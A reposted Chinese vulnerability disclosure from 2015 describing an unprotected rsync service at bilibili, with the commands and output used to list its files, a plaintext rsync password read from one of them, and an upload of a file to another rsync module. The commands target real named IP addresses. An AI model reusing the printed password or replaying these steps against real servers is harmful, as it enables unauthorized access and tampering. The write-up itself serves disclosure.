记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

bilibili rsync访问控制错误导致数据泄露

2015-01-15 04:35

某rsync服务没有合适权限控制,导致文件可访问

rsync 121.52.243.4::websync

drwxr-xr-x 4096 2014/03/14 09:53:57 .

-rw-r--r-- 317 2012/11/29 11:54:39 createKey

-rwxr-xr-x 86 2012/06/14 20:18:07 dropCache

-rwxr-xr-x 417 2013/01/18 20:12:50 nfssync.sh

-rw-r--r-- 3 2014/03/14 09:53:57 pass

-rwx------ 527 2012/01/15 00:56:27 syncApache

-rwx------ 680 2012/01/15 00:51:10 syncConfig

-rwxr-xr-x 266 2012/09/10 15:03:36 syncLVS

-rwxr-xr-x 558 2012/09/03 18:11:26 syncNodeServer

-rwx------ 1366 2012/09/21 22:27:09 syncSLB



文件中又包含了其他rsync服务的密码,导致其他服务可以被访问

cat websync.pas

cyMm6HzcPjxJ5BJj



telnet 121.52.243.12 80

Trying 121.52.243.12...

Connected to 121.52.243.12.

Escape character is '^]'.

GET /root.txt HTTP/1.1

HOST: www.bilibili.com



HTTP/1.1 200 OK

Server: nginx

Date: Thu, 04 Dec 2014 03:31:47 GMT

Content-Type: text/plain

Content-Length: 32

Last-Modified: Thu, 03 Jul 2014 02:50:09 GMT

Connection: keep-alive

X-SLB-Server: hd-slb-2

Accept-Ranges: bytes



9e9fe27b3cef4368e9aa2d33d9d0fbbe



权限可上传任意文件



rsync -avz index.php websync@121.52.243.12::bilibili

sending incremental file list



sent 52 bytes received 11 bytes 42.00 bytes/sec

total size is 2633 speedup is 41.79

 

解决方案:

给rsync加上权限。


知识来源: www.2cto.com/Article/201501/369225.html

阅读:94023 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“bilibili rsync访问控制错误导致数据泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

ANNOUNCE

ADS

标签云